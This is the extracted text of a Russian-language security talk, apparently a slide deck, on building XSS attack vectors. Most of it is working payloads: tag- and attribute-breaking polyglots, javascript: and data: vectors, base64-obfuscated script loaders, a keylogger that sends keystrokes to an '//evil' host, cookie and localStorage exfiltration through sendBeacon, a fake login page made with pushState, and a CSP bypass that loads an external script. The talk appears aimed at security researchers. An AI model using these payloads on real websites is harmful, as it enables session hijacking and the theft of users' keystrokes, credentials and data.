Документ содержит обзор векторов XSS-атак, включая анализ различных HTML-тегов и их атрибутов. Рассматриваются способы экранирования и закрытия тегов для предотвращения выполнения вредоносных скриптов, а также протоколы, используемые в таких атаках. Включены примеры кода и техники, такие как внедрение внешних скриптов и отправка данных с помощью keylogger'ов.

1. Лопаницын Bo0oM Антон
"><script>alert()</script>
В поисках идеального вектора атаки

3. “Ты ваще кто?”

4. Краткий обзор XSS векторов

5. Разбор вектора
Экранирование минуса? Закрывает комментарий-->
‘>">
</style>
</div></article>
</script>
">
<script src=
https://securityz.net/1.js?>
Закрытие атрибутов тега
Закрытие тегов
На всякий случай
Ссылка на https сценарий
83 символа

6. Разбор вектора
-->‘>"></style></div></article></script>"><script
src=https://securityz.net/1.js?>
83 символа
'"--></style></script><script src=//securityz.net/1.js>
55 символов

7. Где не выполнится скрипт?

8. Зачем закрывать теги?
<iframe>
<noembed>
<noscript>
<style>
<xmp>
<script>
<noframes>
<textarea>
<title>
<plaintext>
<template>
<frameset>
< магические теги

9. Зачем закрывать теги?
<iframe>
<noembed>
<noscript>
<style>
<xmp>
<script>
<noframes>
<textarea>
<title>
<plaintext>
<template>
<frameset>
< магические теги

10. Выбираем теги
</noscript></style></script></textarea></title>

11. Выбираем теги
<img> VS <svg>
onError onLoad
src + вызов ошибки

12. Выбираем теги
<img src onerror=alert()>
<svg onload=alert()>
vs

13. Выбираем теги

14. Выбираем теги

15. Разбираемся в протоколах

16. Разбираемся в протоколах
<a href=”XXX”>Homepage</a>
<iframe src=”XXX”></iframe>

17. Разбираемся в протоколах
data:

18. Разбираемся в протоколах
data:

19. Разбираемся в протоколах
data:

20. Разбираемся в протоколах
data:
<script src=data:,alert()></script>

21. Разбираемся в протоколах
javascript:
javascript:alert()
Все просто

22. Разбираемся в протоколах
Текущий протокол - //
http://example.com => <a href=//test> => http://test
https://example.com => <a href=//test> => https://test

23. Разбираемся в протоколах
<a href='//test'>click me</a>

24. Разбираемся в протоколах

26. Разбираемся в протоколах

27. Разбираемся в протоколах

28. Закрываем атрибуты
"> '> -->
==
"'-->

29. Еще частные случаи
<script> /* XXX */ </script>
<script> // XXX </script>
<script> `XXX` </script>

30. Еще частные случаи
<script> a = 'XXX'</script>
<script> a = "XXX"</script>
X’X”X => replace
<script> a = 'X'X"X'</script>
<script> a = "X'X"X"</script>

31. Еще частные случаи
X'X"X =>
<script> a = 'X'X"X'</script>
<script> a = "X’X"X"</script>

33. Вектор CRLF
javascript:"/*'/*`/*--
></noscript></title></textarea></style></template></noem
bed></script><html
"%0Aonmouseover=/*%26lt;svg/*/onload=alert()//>

34. Ок, делаем cвой вектор дальше
"'--></noscript></style></script></textarea></title>
+
<img/src/onerror=alert()>
?

35. Да?

36. НЕТ

37. Подключение внешнего сценария
x=document.createElement('script')
x.src='//evil'
document.body.appendChild(x)

38. Подключение внешнего сценария
atob(/ZD1kb2N1bWVudCx4PWQuY3JlYXRlRWxlbWVudCgnc2NyaXB0Jyk
KeC5zcmM9J2RhdGE6LGFsZXJ0KCknCmQuYm9keS5hcHBlbmRDaGlsZCh
4KQ==/.source)
setTimeout(atob(/ZD1kb2N1bWVudCx4PWQuY3JlYXRlRWxlbWVudCgnc
2NyaXB0JykKeC5zcmM9J2RhdGE6LGFsZXJ0KCknCmQuYm9keS5hcHBlbmR
DaGlsZCh4KQ==/.source))

39. Отправка данных

40. Keylogger
var xhr = new XMLHttpRequest(); xhr.open...
fetch(//evil)

41. Keylogger
<img src onerror='
onkeypress=
(e)=>{fetch("//evil?k="+String.fromCharCode
(e.which))}
,this.remove()
'>

42. Keylogger

43. Keylogger

44. Отправка данных

45. Отправка данных
navigator.sendBeacon(//evil.com’,
location.href)

46. Отправка данных
cookie
localStorage
document.documentElement

47. Перезапись документа
document.write()
document.documentElement.innerHTML=’’
document.body.innerHTML=’’

48. HTML5 History API
history.pushState(0, 0, '/login');

49. Эксплуатация - inspectlet.com

50. Content Security Policy

54. CSP Bypass
f=document.createElement("iframe")
f.src="/css/bootstrap.min.css"
document.body.appendChild(f)

55. CSP Bypass
s=document.createElement('script')
s.src='//bo0om.ru/csp.js'
let f = window.frames[0].document
f.head.appendChild(s)

56. СПАСИБО
ЗА ВНИМАНИЕ!
https://twitter.com/i_bo0om